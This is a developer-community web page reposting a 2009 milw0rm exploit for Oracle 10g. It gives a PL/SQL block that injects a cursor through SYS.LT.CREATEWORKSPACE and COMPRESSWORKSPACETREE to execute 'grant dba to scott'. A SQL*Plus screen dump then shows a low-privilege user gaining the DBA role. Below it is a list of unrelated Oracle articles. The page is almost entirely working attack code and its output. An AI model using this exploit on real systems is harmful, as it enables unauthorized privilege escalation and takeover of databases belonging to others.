AI 助理
文档备案控制台
开发者社区 数据库 文章 正文

Oracle 10g SYS.LT.COMPRESSWORKSPACETREE SQL Injection Exploit

2009-07-04 993
版权
版权声明:
本文内容由阿里云实名注册用户自发贡献,版权归原作者所有,阿里云开发者社区不拥有其著作权,亦不承担相应法律责任。具体规则请查看《 阿里云开发者社区用户服务协议》和 《阿里云开发者社区知识产权保护指引》。如果您发现本社区中有涉嫌抄袭的内容,填写 侵权投诉表单进行举报,一经查实,本社区将立刻删除涉嫌侵权内容。
简介: This is slightly modified version of: http://milw0rm. 
This is slightly modified version of: http://milw0rm.com/exploits/7677


This is based on cursor injection and does not need create function privileges:



DECLARE


D NUMBER;


BEGIN


D := DBMS_SQL.OPEN_CURSOR;


DBMS_SQL.PARSE(D,'declare pragma autonomous_transaction; begin execute immediate ''grant dba to scott'';commit;end;',0);


SYS.LT.CREATEWORKSPACE('a''and dbms_sql.execute('||D||')=1--');


SYS.LT.COMPRESSWORKSPACETREE('a''and dbms_sql.execute('||D||')=1--');


end;



#-----------screen dump---------------------------------------------------#


SQL> select * from user_role_privs;



USERNAME                       GRANTED_ROLE                   ADM DEF OS_


------------------------------ ------------------------------ --- --- ---


SCOTT                          CONNECT                        NO  YES NO


SCOTT                          EXECUTE_CATALOG_ROLE           NO  YES NO


SCOTT                          RESOURCE                       NO  YES NO



SQL> DECLARE


  2  D NUMBER;


  3  BEGIN


  4  D := DBMS_SQL.OPEN_CURSOR;


  5  DBMS_SQL.PARSE(D,'declare pragma autonomous_transaction; begin execute imme


diate ''grant dba to scott'';commit;end;',0);


  6  SYS.LT.CREATEWORKSPACE('a''and dbms_sql.execute('||D||')=1--');


  7  SYS.LT.COMPRESSWORKSPACETREE('a''and dbms_sql.execute('||D||')=1--');


  8  end;


  9


 10


 11  /


DECLARE


*


ERROR at line 1:


ORA-01403: no data found


ORA-06512: at "SYS.LT", line 6118


ORA-06512: at "SYS.LT", line 6087


ORA-06512: at line 7




SQL> select * from user_role_privs;



USERNAME                       GRANTED_ROLE                   ADM DEF OS_


------------------------------ ------------------------------ --- --- ---


SCOTT                          CONNECT                        NO  YES NO


SCOTT                          DBA                            NO  YES NO


SCOTT                          EXECUTE_CATALOG_ROLE           NO  YES NO


SCOTT                          RESOURCE                       NO  YES NO




Sid


www.notsosecure.com



# milw0rm.com [2009-07-02]
文章标签:
SQL
关系型数据库
数据库管理
Oracle
关键词:
Oracle数据库一键上云sql
SQL Injection
SQL exploit
Oracle数据库一键上云exploit
Oracle数据库一键上云injection
cnbird
目录
相关文章
蓝易云
|
9月前
|
SQL Oracle 关系型数据库
Oracle数据库创建表空间和索引的SQL语法示例
以上SQL语法提供了一种标准方式去组织Oracle数据库内部结构,并且通过合理使用可以显著改善查询速度及整体性能。需要注意,在实际应用过程当中应该根据具体业务需求、系统资源状况以及预期目标去合理规划并调整参数设置以达到最佳效果。
蓝易云
599 8
云流雨洄
|
SQL Oracle 关系型数据库
解决大小写、保留字与特殊字符问题!Oracle双引号在SQL中的特殊应用
在Oracle数据库开发中,双引号的使用是一个重要但易被忽视的细节。本文全面解析了双引号在SQL中的特殊应用场景,包括解决标识符与保留字冲突、强制保留大小写、支持特殊字符和数字开头标识符等。同时提供了最佳实践建议,帮助开发者规避常见错误,提高代码可维护性和效率。
云流雨洄
598 6
游客kufrkwrbkmpsa
|
SQL Oracle 关系型数据库
【YashanDB知识库】共享利用Python脚本解决Oracle的SQL脚本@@用法
【YashanDB知识库】共享利用Python脚本解决Oracle的SQL脚本@@用法
游客kufrkwrbkmpsa
286 1
游客kufrkwrbkmpsa
|
SQL Oracle 关系型数据库
【YashanDB知识库】yashandb执行包含带oracle dblink表的sql时性能差
【YashanDB知识库】yashandb执行包含带oracle dblink表的sql时性能差
游客kufrkwrbkmpsa
369 4
游客tvgb6vci6chtq
|
SQL Oracle 关系型数据库
如何在 Oracle 中配置和使用 SQL Profiles 来优化查询性能?
在 Oracle 数据库中,SQL Profiles 是优化查询性能的工具,通过提供额外统计信息帮助生成更有效的执行计划。配置和使用步骤包括:1. 启用自动 SQL 调优;2. 手动创建 SQL Profile,涉及收集、执行调优任务、查看报告及应用建议;3. 验证效果;4. 使用 `DBA_SQL_PROFILES` 视图管理 Profile。
游客tvgb6vci6chtq
1079 5
游客kufrkwrbkmpsa
|
SQL Oracle 关系型数据库
【YashanDB知识库】共享利用Python脚本解决Oracle的SQL脚本@@用法
本文来自YashanDB官网,介绍如何处理Oracle客户端sql*plus中使用@@调用同级目录SQL脚本的场景。崖山数据库23.2.x.100已支持@@用法,但旧版本可通过Python脚本批量重写SQL文件,将@@替换为绝对路径。文章通过Oracle示例展示了具体用法,并提供Python脚本实现自动化处理,最后调整批处理脚本以适配YashanDB运行环境。
游客kufrkwrbkmpsa
278 0
1100237741946300
|
SQL 监控 Oracle
Oracle SQL性能优化全面指南
在数据库管理领域,Oracle SQL性能优化是确保数据库高效运行和数据查询速度的关键
1100237741946300
1829 6
hju6meadphitw
|
SQL 存储 Oracle
Oracle数据库SQL语句详解与应用指南
在数字化时代,数据库已成为各类企业和组织不可或缺的核心组件。Oracle数据库作为业界领先的数据库管理系统之一,广泛应用于各种业务场景。掌握Oracle数据库的SQL语句是数据库管理员、开发人员及运维人员的基本技能。本文将详细介绍Oracle数据库SQL语句的基本概念、语法、应用及最佳实践。一、Or
hju6meadphitw
721 3
何雨晨
|
SQL Oracle 关系型数据库
Oracle SQL:了解执行计划和性能调优
Oracle SQL:了解执行计划和性能调优
何雨晨
541 1
warmhearted
|
SQL 安全 网络安全
SQL注入(SQL Injection)
【8月更文挑战第11天】
warmhearted
872 3